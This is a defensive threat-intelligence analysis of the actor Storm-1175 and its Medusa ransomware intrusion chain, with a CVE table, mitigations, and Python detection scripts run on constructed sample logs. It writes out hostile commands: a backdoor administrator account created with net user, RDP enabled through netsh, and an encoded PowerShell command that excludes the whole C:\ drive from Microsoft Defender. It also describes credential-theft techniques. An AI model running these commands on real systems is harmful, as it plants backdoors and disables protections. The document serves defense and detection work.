Storm-1175 and Medusa Ransomware: Anatomy of a High-Velocity Attack
Storm-1175 and Medusa Ransomware Analysis
Who is Storm-1175?
Storm-1175 is a financially motivated cybercriminal actor, with links attributed to China by external researchers, that runs ransomware campaigns against organizations with exposed perimeter assets. Its defining characteristic is not the sophistication of its tools, many of which are commercial or open-source, but rather the speed with which it converts vulnerabilities into operational access.
On April 6th, Microsoft Threat Intelligence documented that the actor deploys ransomware within windows of 24 hours to 5 days after initial access, a pace that invalidates any patching SLA based on weekly or bi-weekly cycles. In at least two recent cases (CVE-2025-10035 and CVE-2026-23760), Storm-1175 exploited vulnerabilities one week before their public disclosure, suggesting access to exploit development capabilities or pre-disclosure exploit markets.
Storm-1175 Profile
Storm-1175 is the tracking designation assigned by Microsoft Threat Intelligence to a financially motivated threat actor with attributed links to China. Its documented activity spans from 2023 to the date of this analysis, with a consistent focus on organizations in the healthcare, education, professional services, and finance sectors in Australia, the United Kingdom, and the United States.
| Attribute | Description |
|---|---|
| Designation | Storm-1175 |
| Motivation | Financial (ransomware, double extortion) |
| Attributed origin | China (third-party analysis) |
| Active since | At least 2023 |
| Deployed ransomware | Medusa (RaaS) |
| Target sectors | Healthcare, Education, Professional Services, Finance |
| Affected geographies | Australia, United Kingdom, United States |
| Compromise velocity | 24 hours – 5 days (initial access → payload deployment) |
Medusa ransomware operates under a Ransomware-as-a-Service (RaaS) model: its developers provide the infrastructure and payload, while affiliates contribute the intrusion capabilities. Storm-1175 became the star affiliate of the Medusa ecosystem by bringing something previous Medusa attacks lacked: mass data exfiltration. Before Storm-1175, Medusa attacks were limited to encryption. Its incorporation transformed operations into double extortion campaigns, where the threat of public leakage on Medusa’s Dark Web Data Leak Site (DLS) adds a second layer of pressure on victims.
From Broker to Operator
Available indicators suggest Storm-1175 began operating as an Initial Access Broker (IAB): a specialist in obtaining and selling credentials or initial footholds in corporate networks. This function requires exactly the capabilities that characterize it: massive attack surface scanning, rapid N-day exploitation, and management of multiple access vectors simultaneously.
The transition to the role of Medusa affiliate operator expanded its scope. Storm-1175 now not only gains access, but executes the full chain through encryption and exfiltration, enabling the double extortion model characteristic of Medusa’s RaaS:
- Primary extortion: Encryption of the production environment, with a ransom demand for delivery of the decryption key.
- Secondary extortion: Mass exfiltration prior to encryption. Stolen data is published on Medusa’s leak site if the victim does not pay within the established deadline.
This combination significantly increases pressure on victim organizations: even those with functional backups must negotiate to prevent the exposure of sensitive data.
Exploitation Inventory: N-Day and Zero-Day
Documented Vulnerability Table
According to Microsoft Threat Intelligence, since 2023 Storm-1175 has exploited more than 16 vulnerabilities in web-facing systems:
| CVE | Platform / Product | Type | Exploitation Window |
|---|---|---|---|
| CVE-2023-21529 | Microsoft Exchange Server | N-day | Days post-disclosure |
| CVE-2022-41080 | Microsoft Exchange (OWASSRF) | N-day | Chained with CVE-2022-41082 |
| CVE-2022-41082 | Microsoft Exchange (OWASSRF) | N-day | Chained with CVE-2022-41080 |
| CVE-2023-27350 | PaperCut NG/MF | N-day | Days post-disclosure |
| CVE-2023-27351 | PaperCut NG/MF | N-day | Days post-disclosure |
| CVE-2023-46805 | Ivanti Connect Secure / Policy Secure | N-day | Days post-disclosure |
| CVE-2024-21887 | Ivanti Connect Secure / Policy Secure | N-day | Chained with CVE-2023-46805 |
| CVE-2024-1709 | ConnectWise ScreenConnect | N-day | < 48 hours post-disclosure |
| CVE-2024-1708 | ConnectWise ScreenConnect | N-day | < 48 hours post-disclosure |
| CVE-2024-27198 | JetBrains TeamCity | N-day | Days post-disclosure |
| CVE-2024-27199 | JetBrains TeamCity | N-day | Days post-disclosure |
| CVE-2024-57726 | SimpleHelp RMM | N-day | Days post-disclosure |
| CVE-2024-57727 | SimpleHelp RMM | N-day | Days post-disclosure |
| CVE-2024-57728 | SimpleHelp RMM | N-day | Days post-disclosure |
| CVE-2025-31161 | CrushFTP | N-day | Days post-disclosure |
| CVE-2025-31324 | SAP NetWeaver | N-day | ~24 hours post-disclosure |
| CVE-2025-10035 | Fortra GoAnywhere MFT | Zero-Day | 1 week before disclosure |
| CVE-2026-23760 | SmarterTools SmarterMail | Zero-Day | 1 week before disclosure |
| CVE-2026-1731 | BeyondTrust | N-day | Days post-disclosure |
| Oracle WebLogic (no CVE identified) | Oracle WebLogic (Linux) | Unidentified | Late 2024 |
The exploitation of CVE-2025-31324 (SAP NetWeaver) in less than 24 hours from its disclosure on April 24, 2025, represents the most extreme case of rapid weaponization documented for this actor. This suggests that Storm-1175 continuously monitors security advisories and operates automated patch analysis pipelines capable of producing a functional proof-of-concept exploit in hours, not days.
Patch Diffing Analysis: Reverse Engineering as an Exploitation Accelerator
The group has a documented patch diffing process: reverse engineering security patches as soon as they are released by vendors. By comparing the binary before and after the patch, it is possible to identify exactly what code was corrected and, therefore, what the vulnerability was. This process allows them to create functional exploits within hours of disclosure, before most organizations have even started their monthly patching cycle.
The typical process follows this sequence:
- Security bulletin monitoring (NVD, CISA KEV, vendor advisories) to identify critical disclosures.
- Immediate download of the patched version and the vulnerable version of the software.
- Differential analysis using tools such as BinDiff, Diaphora, or static analysis with IDA Pro / Ghidra.
- Exploit development based on the understanding of the attack vector revealed by the diff.
- Active scanning of the internet to identify instances still unpatched.
In the case of CVE-2026-23760 (SmarterMail), watchTowr researchers identified that the new zero-day vulnerability exploited by Storm-1175 was similar in structure to a previously patched flaw in the same product, a pattern known as variant hunting.
Intrusion Anatomy
Phase 1 — Initial Access
Storm-1175 gains initial access exclusively through exploitation of web-facing applications with known (N-day) and unknown (zero-day) vulnerabilities: MFT systems, mail servers, exposed RMM tools, and enterprise collaboration platforms. After successful exploitation, it deploys a web shell or a lightweight remote access payload.
Phase 2 — Persistence and Privilege Escalation
The actor creates a new local user account and immediately adds it to the administrators group:
```cmd
net user [account_name] [password] /add
net localgroup administrators [account_name] /add
```
This account functions as an administrative backdoor independent of the initial access vector, guaranteeing operational continuity even if the web shell is detected and removed.
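Phase 2 leaves a tightly coupled pair of Windows Security events on the host: 4720 (user account created) followed, typically within seconds, by 4732 (member added to a security-enabled local group). The script below is an added example written for this page, not code from the original analysis or from any vendor; it correlates the two event IDs per host and account over a constructed sample of simplified records, and rates a pair created by an IIS application-pool or service identity as critical, since that is what account creation from a Phase 1 web shell looks like. The field names, host names and identities are assumptions made for the sample.

```python
from datetime import datetime, timedelta

# Constructed Windows Security event records. Field names are simplified from
# Event ID 4720 (user account created) and 4732 (member added to a
# security-enabled local group). Illustrative sample, not real telemetry.
SAMPLE_EVENTS = [
    {"time": "2026-04-01T02:14:05", "event_id": 4720, "host": "MFT-EDGE01",
     "subject": "IIS APPPOOL\\DefaultAppPool", "target": "svc_update"},
    {"time": "2026-04-01T02:14:09", "event_id": 4732, "host": "MFT-EDGE01",
     "subject": "IIS APPPOOL\\DefaultAppPool", "target": "svc_update",
     "group": "Administrators"},
    {"time": "2026-04-01T09:30:00", "event_id": 4720, "host": "HR-WS22",
     "subject": "CORP\\helpdesk.admin", "target": "jdoe"},
    {"time": "2026-04-03T11:00:00", "event_id": 4732, "host": "HR-WS22",
     "subject": "CORP\\helpdesk.admin", "target": "jdoe",
     "group": "Remote Desktop Users"},
    {"time": "2026-04-02T08:00:00", "event_id": 4732, "host": "FILE-01",
     "subject": "CORP\\sysadmin", "target": "CORP\\backup-ops",
     "group": "Administrators"},
]

# Identities that have no business creating accounts: a web server's worker
# identity doing so is the signature of a web shell (Phase 1 -> Phase 2).
SERVICE_IDENTITY_PREFIXES = ("IIS APPPOOL\\", "NT SERVICE\\", "NT AUTHORITY\\")


def find_backdoor_admin_accounts(events, window=timedelta(minutes=10)):
    """Correlate 4720 and 4732 on the same host and account.

    Returns one finding per account that was created and then added to the
    local Administrators group within `window`. Creation by a service or
    application-pool identity raises the severity to 'critical'.
    """
    created = {}   # (host, account) -> (creation time, creating identity)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        key = (ev["host"].lower(), ev["target"].lower())
        if ev["event_id"] == 4720:
            created[key] = (t, ev["subject"])
        elif ev["event_id"] == 4732 and ev.get("group", "").lower() == "administrators":
            if key not in created:
                continue  # long-standing account: routine admin change
            t_created, subject = created[key]
            if t - t_created > window:
                continue
            severity = ("critical" if subject.upper().startswith(SERVICE_IDENTITY_PREFIXES)
                        else "high")
            findings.append({
                "host": ev["host"],
                "account": ev["target"],
                "created_by": subject,
                "seconds_to_admin": (t - t_created).total_seconds(),
                "severity": severity,
            })
    return findings


if __name__ == "__main__":
    for finding in find_backdoor_admin_accounts(SAMPLE_EVENTS):
        print(finding)
```

The ten-minute window is deliberately generous: the page describes the group adding the account to the administrators group immediately, but a longer window also catches an operator who scripts the two commands separately. Accounts that already existed before the collection window produce no finding, which keeps routine group changes out of the alert.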
Phase 3 — Reconnaissance and Lateral Movement
Storm-1175 employs a hybrid set of tools for lateral movement:
Documented LOLBins: PowerShell, PsExec, net.exe.
RMM tools used: Atera RMM, N-able, Level RMM, DWAgent, MeshAgent, ConnectWise ScreenConnect, AnyDesk, SimpleHelp.
Covert tunneling: A particularly relevant TTP is the use of Cloudflare Tunnel (cloudflared.exe) renamed to mimic legitimate operating system binaries, such as conhost.exe. This binary establishes an encrypted tunnel toward Cloudflare’s infrastructure, used for pivoting via RDP and delivery of additional payloads. If RDP is blocked, Storm-1175 explicitly enables it by modifying Windows Firewall rules via netsh commands.
Mass deployment: PDQ Deployer, a legitimate enterprise software deployment tool, is repurposed both for lateral movement and for the final ransomware delivery.
Phase 4 — Credential Theft
Storm-1175 implements multiple credential extraction techniques:
- LSASS memory dump: Dumping of the `lsass.exe` process via Task Manager or Impacket.
- Mimikatz: Identified in 2025 intrusions for WDigest credential extraction.
- WDigest cache activation: Modification of `HKLM\SYSTEM\...\WDigest\UseLogonCredential` to force caching of plaintext credentials.
- NTDS.dit extraction: From a compromised Domain Controller, Storm-1175 extracts the `NTDS.dit` file, which contains the password hashes of all Active Directory domain accounts.
- Veeam credential extraction: Specialized script to retrieve credentials stored in the Veeam backup software, used directly for ransomware deployment.
- SAM hive extraction: Extraction of the Security Account Manager hive for local account credentials.
Phase 5 — Defense Evasion
- Windows Defender registry modification: Alteration of keys that control Microsoft Defender Antivirus configuration.
- Antivirus exclusions via PowerShell: Addition of the entire `C:\` drive to exclusions using Base64-encoded PowerShell commands.
Phase 6 — Exfiltration
Exfiltration occurs before encryption, enabling double extortion:
- Bandizip: Data packaging and compression prior to transfer.
- Rclone (renamed as `lsp.exe`): Data synchronization toward attacker-controlled cloud storage. Rclone can operate in continuous synchronization mode, exfiltrating data in real time without manual operator interaction.
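Phases 3, 5 and 6 share one detection opportunity: each leaves a process-creation record whose file name, original name, or command line contradicts what a legitimate binary would produce. The script below is an added example for this page, not code from the original analysis or from any vendor. It runs four checks over constructed Sysmon-style Event ID 1 records: a renamed binary whose PE version resource still names the original tool (the page's `cloudflared.exe` as `conhost.exe` and Rclone as `lsp.exe`), a `conhost.exe` launched from outside System32, `netsh` enabling Remote Desktop through the Windows Firewall, and Base64-encoded PowerShell that, once decoded, adds a Microsoft Defender exclusion. The assumption that both tools ship a version resource carrying their original file name, and all paths, tokens and arguments in the sample, are constructed for the example.

```python
import base64
import re
from pathlib import PureWindowsPath

# Tools the page reports Storm-1175 renaming, keyed by the name in the PE
# version resource (Sysmon reports it as OriginalFileName). Assumption: both
# binaries ship a version resource with these original names.
KNOWN_RENAMES = {"cloudflared.exe": "Cloudflare Tunnel client", "rclone.exe": "Rclone"}

# Constructed sample: the Defender-exclusion command the page describes,
# encoded the way "powershell -enc" expects it (UTF-16LE, then Base64).
EXCLUSION_CMD = 'Add-MpPreference -ExclusionPath "C:\\"'
ENCODED = base64.b64encode(EXCLUSION_CMD.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon-style process-creation records (Event ID 1 fields).
# Not real telemetry; every path, token and argument is illustrative.
SAMPLE_PROCESSES = [
    {"Image": r"C:\Windows\System32\conhost.exe", "OriginalFileName": "CONHOST.EXE",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"Image": r"C:\ProgramData\conhost.exe", "OriginalFileName": "cloudflared.exe",
     "CommandLine": r"C:\ProgramData\conhost.exe tunnel run --token <token-redacted>"},
    {"Image": r"C:\Windows\System32\netsh.exe", "OriginalFileName": "netsh.exe",
     "CommandLine": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"Image": r"C:\Users\Public\lsp.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\Users\Public\lsp.exe sync D:\Shares remote:drop -q"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": f"powershell.exe -NoP -W Hidden -enc {ENCODED}"},
]

SYSTEM32 = "c:\\windows\\system32\\"


def decode_encoded_powershell(cmdline):
    """Return the plaintext of a -e/-ec/-enc/-EncodedCommand argument, or None."""
    m = re.search(r"-(?:enc(?:odedcommand)?|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_process(rec):
    """Return a list of findings for one process-creation record."""
    image = rec["Image"]
    image_name = PureWindowsPath(image).name.lower()
    original = rec.get("OriginalFileName", "").lower()
    cmdline = rec.get("CommandLine", "")
    findings = []

    # Phase 3 / Phase 6: a known tool running under a different file name.
    if original in KNOWN_RENAMES and original != image_name:
        findings.append(f"renamed {KNOWN_RENAMES[original]} running as {image_name}")

    # Phase 3: the real conhost.exe only lives in System32.
    if image_name == "conhost.exe" and not image.lower().startswith(SYSTEM32):
        findings.append("conhost.exe launched from outside System32")

    # Phase 3: RDP being enabled through the Windows Firewall.
    if image_name == "netsh.exe" and re.search(
            r"advfirewall.*(remote desktop|3389).*enable=yes", cmdline, re.I):
        findings.append("netsh enabling RDP through Windows Firewall")

    # Phase 5: encoded PowerShell that adds a Defender exclusion.
    if image_name in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_powershell(cmdline)
        if decoded and re.search(r"Add-MpPreference\s.*-ExclusionPath", decoded, re.I):
            findings.append("encoded PowerShell adding Defender exclusion: " + decoded)
    return findings


def triage(records):
    """Map record index -> findings, for every record with at least one finding."""
    return {i: f for i, rec in enumerate(records) if (f := analyse_process(rec))}


if __name__ == "__main__":
    for idx, found in triage(SAMPLE_PROCESSES).items():
        print(idx, SAMPLE_PROCESSES[idx]["Image"], found)
```

The OriginalFileName comparison is the most durable of the four checks: renaming the file on disk does not change the version resource, so it catches the next alias as well as `conhost.exe` and `lsp.exe`. The encoded-command decoder matters because a plain string match on the command line sees only Base64; decoding it first is what exposes the `-ExclusionPath` call.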
Phase 7 — Impact (Ransomware Deployment)
Medusa ransomware deployment is carried out via two mechanisms:
- PDQ Deployer + RunFileCopy.cmd: Script that delivers the Medusa payload to all reachable hosts on the network.
- Group Policy Object (GPO): When Storm-1175 has compromised a Domain Controller, it creates or modifies a GPO to deploy ransomware simultaneously across all domain systems.
Storm-1175’s profile allows controls to be clearly prioritized: since its entry vector is always the perimeter and its weapon is speed, preventive measures have a far superior return compared to reactive ones.
1. Perimeter patching in windows of hours, not days. For any CVE listed in the CISA KEV catalog affecting web-facing software, the target must be to apply the patch in less than 72 hours. The group has weaponized exploits in less than 24 hours after disclosure.
2. Continuous attack surface visibility. Implement External Attack Surface Management (EASM) tools to know which assets are exposed to the Internet before Storm-1175 finds them. You cannot protect what you do not know exists.
3. Real isolation of perimeter systems. Web-facing servers behind a WAF, reverse proxy, or DMZ, with no direct access to the internal network. This control alone does not stop the group, but it forces lateral movement to be detectable.
4. Strict control of RMM tools. Whitelist of authorized remote administration tools, with automatic alerts on any out-of-inventory installation. Unauthorized AnyDesk or SimpleHelp on a server is a signal of active compromise.
5. Credential Guard enabled and verified. Protects credentials stored in LSASS against dumping. Active by default in Windows 11 but must be verified in existing environments, especially before joining new devices to the domain.
6. Tamper Protection + DisableLocalAdminMerge. Prevents attackers with local administrator privileges from disabling the antivirus or configuring exclusions via GPO. Without this control, the group can neutralize endpoint defenses without escalating domain privileges.
7. Phishing-resistant MFA on privileged accounts. Credential theft is central to the attack chain. FIDO2 on domain administrator accounts significantly limits the post-compromise radius of action, even if the group manages to dump NTDS.dit.
8. Segmentation and active monitoring of RDP. RDP disabled by default on the internal network, with alerts on firewall policy modifications. Storm-1175 actively enables RDP when it is unavailable; that policy modification is a high-relevance alert signal that occurs before encryption.
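Controls 1 and 2 together reduce to a measurable question: for every Internet-exposed asset running a product with a CISA KEV entry, how many hours passed between the KEV listing and the patch, and is the 72-hour target met? The script below is an added example for this page, not code from the original analysis or from CISA. It joins a constructed KEV-style list (field names follow CISA's published KEV JSON feed, the dates are illustrative) with a constructed asset inventory of the kind an EASM tool exports, and reports exposure hours, SLA breaches and priority, with Internet-facing assets first. Host names, dates and the product-to-asset mapping are assumptions made for the sample.

```python
from datetime import datetime, timedelta, timezone

PATCH_SLA = timedelta(hours=72)  # target from control 1

# Constructed KEV-style entries. Field names follow CISA's KEV JSON feed
# (cveID, vendorProject, product, dateAdded); the dates are illustrative.
SAMPLE_KEV = [
    {"cveID": "CVE-2025-31324", "vendorProject": "SAP", "product": "NetWeaver",
     "dateAdded": "2025-04-29"},
    {"cveID": "CVE-2025-10035", "vendorProject": "Fortra", "product": "GoAnywhere MFT",
     "dateAdded": "2025-09-29"},
]

# Constructed asset inventory, as an EASM or CMDB export might look (control 2).
SAMPLE_ASSETS = [
    {"host": "sap-portal-01", "vendorProject": "SAP", "product": "NetWeaver",
     "internet_exposed": True, "patched_at": "2025-04-30T10:00:00"},
    {"host": "mft-edge-01", "vendorProject": "Fortra", "product": "GoAnywhere MFT",
     "internet_exposed": True, "patched_at": None},
    {"host": "mft-int-02", "vendorProject": "Fortra", "product": "GoAnywhere MFT",
     "internet_exposed": False, "patched_at": None},
    {"host": "wiki-01", "vendorProject": "Atlassian", "product": "Confluence",
     "internet_exposed": True, "patched_at": None},
]

# Fixed "now" so the sample report is reproducible (constructed date).
REPORT_AS_OF = datetime(2025, 10, 6, tzinfo=timezone.utc)


def _utc(stamp):
    """Parse an ISO date or datetime as UTC (KEV dates have day granularity)."""
    return datetime.fromisoformat(stamp).replace(tzinfo=timezone.utc)


def exposure_report(kev, assets, now=None, sla=PATCH_SLA):
    """Pair each asset with the KEV entries for its product and measure how
    long it stayed (or is still) unpatched after the KEV listing date."""
    now = now or datetime.now(timezone.utc)
    by_product = {}
    for entry in kev:
        by_product.setdefault((entry["vendorProject"], entry["product"]), []).append(entry)

    rows = []
    for asset in assets:
        for entry in by_product.get((asset["vendorProject"], asset["product"]), []):
            listed = _utc(entry["dateAdded"])
            end = _utc(asset["patched_at"]) if asset["patched_at"] else now
            hours = max(0.0, (end - listed).total_seconds() / 3600)
            rows.append({
                "host": asset["host"],
                "cve": entry["cveID"],
                "status": "patched" if asset["patched_at"] else "UNPATCHED",
                "hours_exposed": round(hours, 1),
                "sla_breached": timedelta(hours=hours) > sla,
                # Exposed perimeter assets are the group's entry vector: first in line.
                "priority": "critical" if asset["internet_exposed"] else "high",
            })
    # Unpatched first, then Internet-exposed, then longest exposure.
    return sorted(rows, key=lambda r: (r["status"] != "UNPATCHED",
                                       r["priority"] != "critical",
                                       -r["hours_exposed"]))


if __name__ == "__main__":
    for row in exposure_report(SAMPLE_KEV, SAMPLE_ASSETS, now=REPORT_AS_OF):
        print(row)
```

Measuring from the KEV listing date is a floor, not the full picture: the page documents exploitation within 24 hours of vendor disclosure and, twice, before it, so a stricter version of this report keys on the vendor advisory date and treats any KEV-listed product on the perimeter as already under attack.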
References
- Microsoft Threat Intelligence — Storm-1175 focuses gaze on vulnerable web-facing assets (April 6, 2026)
- The Hacker News — China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware
- Dark Reading — Storm-1175, Medusa Ransomware, High Velocity
- CybersecurityNews — Microsoft Warns Storm-1175 Exploits Web-Facing Assets 0-Day Flaws
- CyberDefensa.mx — Storm-1175 vinculada a China aprovecha los días cero